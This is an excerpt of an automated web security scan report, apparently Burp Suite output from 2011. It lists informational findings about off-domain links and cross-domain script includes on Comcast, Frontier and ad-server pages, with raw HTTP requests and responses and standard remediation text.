Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xpbar&amp;highlight=comcastcom">here</a>
...[SNIP]...

15.126. http://www.xfinity.com/js-api/compressed/xpbar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xfinity.com
Path:   /js-api/compressed/xpbar.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js-api/compressed/xpbar.js?id=xbardiv&highlight=comcastcom&version=2 HTTP/1.1
Host: www.xfinity.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xbardiv&highlight=comcastcom&version=2
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2">here</a>
...[SNIP]...

15.127. http://xfinity.comcast.net/xpbar/1/default/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /xpbar/1/default/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xpbar/1/default/?referrer=http%3A%2F%2Fsitesearch.comcast.com%2F&highlight=comcastcom HTTP/1.1
Host: xfinity.comcast.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:19:54 GMT
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 12:24:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 14439
Date: Tue, 06 Sep 2011 12:22:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<li class="first xfinity"><a class="xfinity" href="http://www.xfinity.com?intcmp=xpbar" rel="default" title="XFINITY - TV, Voice and Internet"><span class="">
...[SNIP]...

15.128. http://xfinity.comcast.net/xpbar/2/default/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /xpbar/2/default/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xpbar/2/default/?referrer=http%3A%2F%2Fwww.comcast.com%2F&highlight=comcastcom HTTP/1.1
Host: xfinity.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:15:49 GMT
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 12:20:49 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 14275
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<li class="first xfinity"><a class="xfinity" href="http://www.xfinity.com?intcmp=xpbar" rel="default" title="XFINITY - TV, Voice and Internet"><span class="">
...[SNIP]...

15.129. http://yp.frontierpages.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yp.frontierpages.com
Path:   /results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=&city=Dallas&state=TX&zip= HTTP/1.1
Host: yp.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cznpages%3D%2526pid%253Dfrontierpages.com/region.asp%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturnBusinessSearch%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DIMG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<link href="
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/ftr.frontierpages.com/;tile=1;sz=300x250;ord=123456789?" target="_blank" >
<img src="http://ad.doubleclick.net/ad/ftr.frontierpages.com/;tile=1;sz=300x250;ord=123456789?" border="0" alt="" />
</a>
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img alt="" border="0" height="1" src="http://cznquapages.112.2O7.net/b/ss/cznquapages/1/H.19.4--NS/0"
width="1" />

</a>
...[SNIP]...

16. Cross-domain script include  previous  next
There are 72 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:41 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:57 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

16.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

16.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.7. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313124134052&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p48ptjt/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320324/L=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL/B=ihhvQUoGYno-/J=1315313124134052/K=MkO1E30KWMQ9OU8J05I8pg/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR-4M6Eq!79C851U_*; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; lifb=0EA2)A9.-BM7F2P; 